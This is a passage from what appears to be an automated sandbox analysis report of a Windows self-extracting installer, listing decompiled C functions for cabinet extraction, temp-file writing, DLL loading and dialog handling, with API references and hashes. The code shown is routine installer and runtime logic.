                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Message$BeepVersion
                  • String ID: 3$Umorals4
                  • API String ID: 2519184315-3585417447
                  • Opcode ID: 8e3603007be71155c34e77d07ac7397de2ebec5cabeba965c945f89e5134ae4d
                  • Instruction ID: da769c569a6f03c4578a01e2a8ff6a991534a6e5275fb4e551ee64e0cc7c7d5d
                  • Opcode Fuzzy Hash: 8e3603007be71155c34e77d07ac7397de2ebec5cabeba965c945f89e5134ae4d
                  • Instruction Fuzzy Hash: 8E81D2B2E052249FEB24CB15CC91BA9B3B1AB45334F1500A9E94AD7290C7749F81FF41
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 20%
                  			E00F34DA8(void* __ebx, void* __edx) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void _v32;
                  				char _v44;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t10;
                  				signed int _t14;
                  				void* _t17;
                  				signed int _t19;
                  				void* _t21;
                  				signed int _t22;
                  				void* _t28;
                  				signed int _t31;
                  				void* _t32;
                  				void* _t33;
                  				signed int _t34;
                  				void* _t43;
                  
                  				_t28 = __edx;
                  				_t21 = __ebx;
                  				_t10 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t10 ^ _t34;
                  				_t22 = 6;
                  				memset( &_v32, 0, _t22 << 2);
                  				_t14 =  &_v44;
                  				__imp__#20(E00F34BA0, E00F34BC0, E00F34860, E00F34940, E00F349C0, E00F34A60, E00F34AC0, 1, _t14);
                  				_t31 = _t14;
                  				if(_t31 != 0) {
                  					_push(_t32);
                  					_push(0x180);
                  					_t33 = E00F34860("*MEMCAB", 0x8000);
                  					if(_t33 == 0xffffffff) {
                  						L8:
                  						_t14 = 0;
                  					} else {
                  						_t17 =  &_v32;
                  						__imp__#21(_t31, _t33, _t17);
                  						if(_t17 == 0) {
                  							goto L8;
                  						} else {
                  							_t43 = _v32 -  *0xf39184; // 0xf062
                  							if(_t43 != 0 || _v16 != 0 || _v12 != 0) {
                  								goto L8;
                  							} else {
                  								_t19 = E00F34A60(_t33);
                  								if(_t19 == 0xffffffff) {
                  									goto L8;
                  								} else {
                  									__imp__#23(_t31);
                  									asm("sbb eax, eax");
                  									_t14 =  ~( ~_t19);
                  								}
                  							}
                  						}
                  					}
                  					_pop(_t32);
                  				}
                  				return E00F36C20(_t14, _t21, _v8 ^ _t34, _t28, _t31, _t32);
                  			}

                  APIs
                  • #20.CABINET(00F34BA0,00F34BC0,00F34860,00F34940,00F349C0,00F34A60,00F34AC0,00000001,?,00000000), ref: 00F34DEE
                  • #21.CABINET(00000000,00000000,?,?,?,CABINET), ref: 00F34E22
                  • #23.CABINET(00000000), ref: 00F34E53
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID: *MEMCAB$CABINET
                  • API String ID: 0-2642027498
                  • Opcode ID: 89cb826632ee2185b32b246d046bed03786d8867d26b3ee09d5d9ab0bdaefa57
                  • Instruction ID: 4644f819ea4bce7943167c296c628fc8ea1503f84ea9edaa90c68fef823cc1fc
                  • Opcode Fuzzy Hash: 89cb826632ee2185b32b246d046bed03786d8867d26b3ee09d5d9ab0bdaefa57
                  • Instruction Fuzzy Hash: 8B11D331E442087ACB14EBA5AC46FAF73A5EB80B30F104215F911A61C0DBBCF986B656
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E00F3635A(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                  				signed int _v8;
                  				char _v268;
                  				void* __edi;
                  				signed int _t9;
                  				signed char _t14;
                  				struct HINSTANCE__* _t15;
                  				void* _t18;
                  				CHAR* _t26;
                  				void* _t27;
                  				signed int _t28;
                  
                  				_t27 = __esi;
                  				_t18 = __ebx;
                  				_t9 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t9 ^ _t28;
                  				_push(__ecx);
                  				E00F3158C( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                  				_t26 = "advpack.dll";
                  				E00F364E7( &_v268, 0x104, _t26);
                  				_t14 = GetFileAttributesA( &_v268);
                  				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                  					_t15 = LoadLibraryA(_t26);
                  				} else {
                  					_t15 = LoadLibraryExA( &_v268, 0, 8);
                  				}
                  				return E00F36C20(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                  			}

                  APIs
                  • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00F363A4
                  • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00F363BE
                  • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00F363C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: LibraryLoad$AttributesFile
                  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                  • API String ID: 438848745-258089097
                  • Opcode ID: d21954d638a06de50059191cac572c6c20b1dc0c4cf55081c9d0ac03397fe94f
                  • Instruction ID: 596a35d4f54e97cf1c062ff764eccb87cbd1f107d397cdbfa5be361ecabf18a2
                  • Opcode Fuzzy Hash: d21954d638a06de50059191cac572c6c20b1dc0c4cf55081c9d0ac03397fe94f
                  • Instruction Fuzzy Hash: C3012170A00108ABC714EB60DC49EEA7379EB95330F404199F5C4D2290CFB49D8AAA11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00F33FC9() {
                  				int _t18;
                  				void* _t21;
                  
                  				_t20 = E00F34538("FINISHMSG", 0, 0);
                  				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                  				if(_t21 != 0) {
                  					if(E00F34538("FINISHMSG", _t21, _t20) != 0) {
                  						if(lstrcmpA(_t21, "<None>") == 0) {
                  							L7:
                  							return LocalFree(_t21);
                  						}
                  						_push(0);
                  						_push(0x40);
                  						_push(0);
                  						_push(_t21);
                  						_t18 = 0x3e9;
                  						L6:
                  						E00F34327(0, _t18);
                  						goto L7;
                  					}
                  					_push(0);
                  					_push(0x10);
                  					_push(0);
                  					_push(0);
                  					_t18 = 0x4b1;
                  					goto L6;
                  				}
                  				return E00F34327(0, 0x4b5, 0, 0, 0x10, 0);
                  			}

                  APIs
                    • Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
                    • Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552
                  • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00F32F3A), ref: 00F33FE9
                  • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00F32F3A), ref: 00F34047
                    • Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
                    • Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: LocalResource$AllocFindFreeLoadMessageSizeofString
                  • String ID: <None>$FINISHMSG
                  • API String ID: 124676843-3091758298
                  • Opcode ID: c33ffac4d61f1c0502829c2f063ccb0c6e115c098c8e850b0bf0207b7897bc4f
                  • Instruction ID: 6a149fc9db10599a46c2030fa13403e254a1a9d94a375196c910f341a5c24c15
                  • Opcode Fuzzy Hash: c33ffac4d61f1c0502829c2f063ccb0c6e115c098c8e850b0bf0207b7897bc4f
                  • Instruction Fuzzy Hash: BE0181E27002187BF33816669C86F7B714EEB857B5F514029B746E2291DA6CFC017176
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00F31800(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                  				signed int _v8;
                  				char _v520;
                  				void* __esi;
                  				signed int _t11;
                  				void* _t14;
                  				void* _t23;
                  				void* _t27;
                  				void* _t33;
                  				struct HWND__* _t34;
                  				signed int _t35;
                  
                  				_t33 = __edi;
                  				_t27 = __ebx;
                  				_t11 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t11 ^ _t35;
                  				_t34 = _a4;
                  				_t14 = _a8 - 0x110;
                  				if(_t14 == 0) {
                  					_t32 = GetDesktopWindow();
                  					E00F34239(_t34, _t15);
                  					_v520 = 0;
                  					LoadStringA( *0xf39164, _a16,  &_v520, 0x200);
                  					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                  					MessageBeep(0xffffffff);
                  					goto L6;
                  				} else {
                  					if(_t14 != 1) {
                  						L4:
                  						_t23 = 0;
                  					} else {
                  						_t32 = _a12;
                  						if(_t32 - 0x83d > 1) {
                  							goto L4;
                  						} else {
                  							EndDialog(_t34, _t32);
                  							L6:
                  							_t23 = 1;
                  						}
                  					}
                  				}
                  				return E00F36C20(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                  			}














                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                  • String ID:
                  • API String ID: 1273765764-0
                  • Opcode ID: 582974e86ae2fd03bab8e680a7d41178196d5c72059f7a305892923ba048c2f6
                  • Instruction ID: bb3a90f42d6d7887799f2993180a4750d384f959c3993cc05181be4ce4f62c60
                  • Opcode Fuzzy Hash: 582974e86ae2fd03bab8e680a7d41178196d5c72059f7a305892923ba048c2f6
                  • Instruction Fuzzy Hash: 2911C071A0010DABDB10EF64DD08AAE77AAFF48330F1081A4F962D7191DB349E11EB96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 41%
                  			E00F37180(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
                  				signed int _v8;
                  				char _v9;
                  				signed int _v16;
                  				char _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				char _v36;
                  				intOrPtr* _v44;
                  				signed int _t59;
                  				char _t64;
                  				signed int _t73;
                  				intOrPtr* _t74;
                  				void* _t75;
                  				intOrPtr* _t81;
                  				intOrPtr _t83;
                  				signed int _t89;
                  				void* _t90;
                  				intOrPtr _t91;
                  				signed int _t98;
                  				intOrPtr _t108;
                  				void* _t109;
                  				intOrPtr _t110;
                  				intOrPtr _t112;
                  				void* _t113;
                  				intOrPtr* _t114;
                  				signed int _t115;
                  				void* _t117;
                  				void* _t118;
                  				void* _t125;
                  
                  				_t59 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t59 ^ _t115;
                  				_push(__ebx);
                  				_push(__esi);
                  				_t112 = _a16;
                  				_push(__edi);
                  				_v9 = 0;
                  				_v20 = 1;
                  				_t89 =  *(_t112 + 8) ^  *_a4;
                  				_v24 = _t112 + 0x10;
                  				_v16 = _t89;
                  				E00F37130(_a8, _t89, _t112 + 0x10);
                  				_t108 = _a20;
                  				E00F377C1(_t108);
                  				_t64 = _a12;
                  				_t118 = _t117 + 0x10;
                  				if(( *(_t64 + 4) & 0x00000066) != 0) {
                  					__eflags =  *((intOrPtr*)(_t112 + 0xc)) - 0xfffffffe;
                  					if( *((intOrPtr*)(_t112 + 0xc)) != 0xfffffffe) {
                  						_t104 = 0xfffffffe;
                  						E00F37108(_t112, 0xfffffffe, _t112 + 0x10, _a4);
                  						goto L20;
                  					}
                  					goto L21;
                  				} else {
                  					_v36 = _t64;
                  					_v32 = _t108;
                  					_t110 =  *((intOrPtr*)(_t112 + 0xc));
                  					 *((intOrPtr*)(_t112 - 4)) =  &_v36;
                  					if(_t110 == 0xfffffffe) {
                  						L21:
                  						__eflags = _v8 ^ _t115;
                  						_pop(_t109);
                  						_pop(_t113);
                  						_pop(_t90);
                  						return E00F36C20(_v20, _t90, _v8 ^ _t115, _t104, _t109, _t113);
                  					} else {
                  						while(1) {
                  							_t73 = _t110 + (_t110 + 2) * 2;
                  							_t97 =  *((intOrPtr*)(_t89 + 4 + _t73 * 4));
                  							_t74 = _t89 + _t73 * 4;
                  							_t91 =  *_t74;
                  							_v28 = _t74;
                  							if( *((intOrPtr*)(_t89 + 4 + _t73 * 4)) == 0) {
                  								goto L12;
                  							}
                  							_t104 = _t112 + 0x10;
                  							_t75 = E00F370BE(_t97, _t112 + 0x10);
                  							_t98 = 1;
                  							_v9 = 1;
                  							_t125 = _t75;
                  							if(_t125 < 0) {
                  								_t89 = _v16;
                  								_v20 = 0;
                  								goto L20;
                  							} else {
                  								if(_t125 <= 0) {
                  									L13:
                  									_t110 = _t91;
                  									__eflags = _t91 - 0xfffffffe;
                  									if(_t91 == 0xfffffffe) {
                  										__eflags = _t98;
                  										if(_t98 != 0) {
                  											_t89 = _v16;
                  											L20:
                  											E00F37130(_a8, _t89, _v24);
                  										}
                  										goto L21;
                  									} else {
                  										_t89 = _v16;
                  										continue;
                  									}
                  								} else {
                  									_t76 = _a12;
                  									if( *_a12 == 0xe06d7363) {
                  										_t127 =  *0xf388f4;
                  										if( *0xf388f4 != 0) {
                  											_t76 = E00F374A0(_t127, 0xf388f4);
                  											_t118 = _t118 + 4;
                  											if(_t76 != 0) {
                  												_t114 =  *0xf388f4; // 0x0
                  												 *0xf3a290(_a12, 1);
                  												_t76 =  *_t114();
                  												_t112 = _a16;
                  												_t118 = _t118 + 8;
                  											}
                  										}
                  									}
                  									E00F370EE(_t76, _t112);
                  									if( *((intOrPtr*)(_t112 + 0xc)) != _t110) {
                  										E00F37108(_t112, _t110, _t112 + 0x10, _a4);
                  									}
                  									 *((intOrPtr*)(_t112 + 0xc)) = _t91;
                  									E00F37130(_a4, _v20, _t112 + 0x10);
                  									E00F370D5();
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									asm("int3");
                  									_push(_t115);
                  									_t81 =  *_v44;
                  									if( *_t81 == 0xe06d7363 &&  *((intOrPtr*)(_t81 + 0x10)) == 3) {
                  										_t83 =  *((intOrPtr*)(_t81 + 0x14));
                  										if(_t83 == 0x19930520 || _t83 == 0x19930521 || _t83 == 0x19930522 || _t83 == 0x1994000) {
                  											__imp__?terminate@@YAXXZ();
                  										}
                  									}
                  									return 0;
                  								}
                  							}
                  							goto L31;
                  							L12:
                  							_t98 = _v9;
                  							goto L13;
                  						}
                  					}
                  				}
                  				L31:
                  			}


































                  APIs
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00F37232
                  • ?terminate@@YAXXZ.MSVCRT ref: 00F37347
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ?terminate@@CurrentImageNonwritable
                  • String ID: csm$csm
                  • API String ID: 3343398186-3733052814
                  • Opcode ID: d730178fca618bbc04ecc643f48f2c745ecb150852405f184d1f70b297068ff9
                  • Instruction ID: 130dae47355d22c391797f9d12eae3c8ef943862b04bcab26b526e39b6f36a9d
                  • Opcode Fuzzy Hash: d730178fca618bbc04ecc643f48f2c745ecb150852405f184d1f70b297068ff9
                  • Instruction Fuzzy Hash: B651ACB19083099FCB24EFA9C8809AFBBB9AF44334F14845AE85597351D735EE01EF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00F36280(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                  				signed int _v8;
                  				char _v268;
                  				long _v272;
                  				void* _v276;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t15;
                  				long _t28;
                  				struct _OVERLAPPED* _t37;
                  				void* _t39;
                  				signed int _t40;
                  
                  				_t15 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t15 ^ _t40;
                  				_v272 = _v272 & 0x00000000;
                  				_push(__ecx);
                  				_v276 = _a16;
                  				_t37 = 1;
                  				E00F3158C( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                  				E00F364E7( &_v268, 0x104, _a12);
                  				_t28 = 0;
                  				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                  				if(_t39 != 0xffffffff) {
                  					_t28 = _a4;
                  					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                  						 *0xf39a88 = 0x80070052;
                  						_t37 = 0;
                  					}
                  					CloseHandle(_t39);
                  				} else {
                  					 *0xf39a88 = 0x80070052;
                  					_t37 = 0;
                  				}
                  				return E00F36C20(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                  			}
















                  APIs
                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F362ED
                  • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F3631B
                  • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F3633A
                  Strings
                  • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F362AB
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: File$CloseCreateHandleWrite
                  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                  • API String ID: 1065093856-2312194364
                  • Opcode ID: 607743d825a08e5779adf4108c2bbecd2cbe73460f0adcb9f471c2b8b3845651
                  • Instruction ID: ca08d460d054427a18da4b2e5e846097c0efb0039bf4bcb14341df14c03f53ba
                  • Opcode Fuzzy Hash: 607743d825a08e5779adf4108c2bbecd2cbe73460f0adcb9f471c2b8b3845651
                  • Instruction Fuzzy Hash: BE21C3B1A0021CABDB24DF25DC85FEB776DEB84334F104169B945E3240DBB49D85AF60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E00F363E1(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                  				struct HRSRC__* _t6;
                  				void* _t21;
                  				struct HINSTANCE__* _t23;
                  				int _t24;
                  
                  				_t23 =  *0xf39164; // 0xf30000
                  				_t6 = FindResourceA(_t23, __edx, 5);
                  				if(_t6 == 0) {
                  					L6:
                  					E00F34327(0, 0x4fb, 0, 0, 0x10, 0);
                  					_t24 = _a16;
                  				} else {
                  					_t21 = LoadResource(_t23, _t6);
                  					if(_t21 == 0) {
                  						goto L6;
                  					} else {
                  						if(_a12 != 0) {
                  							_push(_a12);
                  						} else {
                  							_push(0);
                  						}
                  						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                  						FreeResource(_t21);
                  						if(_t24 == 0xffffffff) {
                  							goto L6;
                  						}
                  					}
                  				}
                  				return _t24;
                  			}








                  APIs
                  • FindResourceA.KERNEL32(00F30000,000007D6,00000005), ref: 00F363F4
                  • LoadResource.KERNEL32(00F30000,00000000,?,?,00F32D76,00000000,00F31800,00000547,0000083E,?,?,?,?,?,?,00000000), ref: 00F36402
                  • DialogBoxIndirectParamA.USER32 ref: 00F36421
                  • FreeResource.KERNEL32(00000000,?,?,00F32D76,00000000,00F31800,00000547,0000083E,?,?,?,?,?,?,00000000,00000001), ref: 00F3642A
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Resource$DialogFindFreeIndirectLoadParam
                  • String ID:
                  • API String ID: 1214682469-0
                  • Opcode ID: a17f32cb8338e4150ca8ee18415968cb96df45f3ef0c0b50702d0ef5ea16bafd
                  • Instruction ID: 68dc01050ef3dde79fd83f9f591ace05355d21dd006b1e2d21840841c3ba484c
                  • Opcode Fuzzy Hash: a17f32cb8338e4150ca8ee18415968cb96df45f3ef0c0b50702d0ef5ea16bafd
                  • Instruction Fuzzy Hash: E9012672900209BBCB115F69DC08DAB766EEB85370F008129FE20D3090DB70CC10B7B1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F33514(void* __ecx) {
                  				void* _v8;
                  				struct tagMSG _v36;
                  				int _t8;
                  				struct HWND__* _t16;
                  
                  				_v8 = __ecx;
                  				_t16 = 0;
                  				while(1) {
                  					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                  					if(_t8 == 0) {
                  						break;
                  					}
                  					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                  						continue;
                  					} else {
                  						do {
                  							if(_v36.message != 0x12) {
                  								DispatchMessageA( &_v36);
                  							} else {
                  								_t16 = 1;
                  							}
                  							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                  						} while (_t8 != 0);
                  						if(_t16 == 0) {
                  							continue;
                  						}
                  					}
                  					break;
                  				}
                  				return _t8;
                  			}








                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Message$Peek$DispatchMultipleObjectsWait
                  • String ID:
                  • API String ID: 2776232527-0
                  • Opcode ID: 7ff34d85f5189836acfcf12166d6139d93281879ec00c585e8e943b14e9c1ee6
                  • Instruction ID: 215bdb3ec15e145aff8dac1ea22bb47c680050d72627ff921ffc7dd3ee8f9a96
                  • Opcode Fuzzy Hash: 7ff34d85f5189836acfcf12166d6139d93281879ec00c585e8e943b14e9c1ee6
                  • Instruction Fuzzy Hash: 0B016776D0011977DB309A9A5C08EEBBA7CDBC5B30F040119BE15E2080D664DA00EAB1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F368C0() {
                  				signed int _t10;
                  				intOrPtr* _t13;
                  				intOrPtr* _t14;
                  				void* _t15;
                  				signed int _t18;
                  				intOrPtr _t19;
                  				intOrPtr _t22;
                  				intOrPtr _t23;
                  				void* _t25;
                  
                  				_t25 =  *0xf30000 - 0x5a4d; // 0x5a4d
                  				if(_t25 == 0) {
                  					_t19 =  *0xf3003c; // 0xf0
                  					__eflags =  *((intOrPtr*)(_t19 + 0xf30000)) - 0x4550;
                  					if( *((intOrPtr*)(_t19 + 0xf30000)) != 0x4550) {
                  						goto L1;
                  					} else {
                  						_t2 = _t19 + 0xf30018; // 0xb010b
                  						_t18 =  *_t2 & 0x0000ffff;
                  						__eflags = _t18 - 0x10b;
                  						if(_t18 == 0x10b) {
                  							_t10 = 0;
                  							__eflags =  *((intOrPtr*)(_t19 + 0xf30074)) - 0xe;
                  							if( *((intOrPtr*)(_t19 + 0xf30074)) > 0xe) {
                  								__eflags =  *(_t19 + 0xf300e8);
                  								goto L9;
                  							}
                  						} else {
                  							__eflags = _t18 - 0x20b;
                  							if(_t18 != 0x20b) {
                  								goto L1;
                  							} else {
                  								_t10 = 0;
                  								__eflags =  *((intOrPtr*)(_t19 + 0xf30084)) - 0xe;
                  								if( *((intOrPtr*)(_t19 + 0xf30084)) > 0xe) {
                  									__eflags =  *(_t19 + 0xf300f8);
                  									L9:
                  									_t8 = __eflags != 0;
                  									__eflags = _t8;
                  									_t10 = _t10 & 0xffffff00 | _t8;
                  								}
                  							}
                  						}
                  					}
                  				} else {
                  					L1:
                  					_t10 = 0;
                  				}
                  				 *0xf38238 = _t10;
                  				__set_app_type(E00F373EE(2));
                  				 *0xf388e4 =  *0xf388e4 | 0xffffffff;
                  				 *0xf388e8 =  *0xf388e8 | 0xffffffff;
                  				_t13 = __p__fmode();
                  				_t22 =  *0xf38568; // 0x0
                  				 *_t13 = _t22;
                  				_t14 = __p__commode();
                  				_t23 =  *0xf3855c; // 0x0
                  				 *_t14 = _t23;
                  				_t15 = E00F37440();
                  				if( *0xf38010 == 0) {
                  					__setusermatherr(E00F37440);
                  				}
                  				E00F3764F(_t15);
                  				return 0;
                  			}













                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __p__commode__p__fmode__set_app_type__setusermatherr
                  • String ID:
                  • API String ID: 1063105408-0
                  • Opcode ID: 4fb03ee83f2dcb8ca40059e9f564b2084e22bfa0a239b63e437e4950d9f11fb1
                  • Instruction ID: d20b3d15305e308bae9112ebcea51fc21edd430c8f257b559c327f32d7624ff9
                  • Opcode Fuzzy Hash: 4fb03ee83f2dcb8ca40059e9f564b2084e22bfa0a239b63e437e4950d9f11fb1
                  • Instruction Fuzzy Hash: 821186B0905308DFD7689B30D85D7153762EB04375F24896AE451CA2E1DF7EC886FB11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E00F3654A(char* __ecx) {
                  				char _t3;
                  				char _t10;
                  				char* _t12;
                  				char* _t14;
                  				char* _t15;
                  				CHAR* _t16;
                  
                  				_t12 = __ecx;
                  				_t15 = __ecx;
                  				_t14 =  &(__ecx[1]);
                  				_t10 = 0;
                  				do {
                  					_t3 =  *_t12;
                  					_t12 =  &(_t12[1]);
                  				} while (_t3 != 0);
                  				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                  				while(1) {
                  					_t16 = CharPrevA(_t15, ??);
                  					if(_t16 <= _t15) {
                  						break;
                  					}
                  					if( *_t16 == 0x5c) {
                  						L7:
                  						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                  							_t16 = CharNextA(_t16);
                  						}
                  						 *_t16 = _t10;
                  						_t10 = 1;
                  					} else {
                  						_push(_t16);
                  						continue;
                  					}
                  					L11:
                  					return _t10;
                  				}
                  				if( *_t16 == 0x5c) {
                  					goto L7;
                  				}
                  				goto L11;
                  			}










                  APIs
                  • CharPrevA.USER32(?,00000000,00000000,00000000,00000000,00F329B1), ref: 00F36564
                  • CharPrevA.USER32(?,00000000), ref: 00F36574
                  • CharPrevA.USER32(?,00000000), ref: 00F3658B
                  • CharNextA.USER32(00000000), ref: 00F36597
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
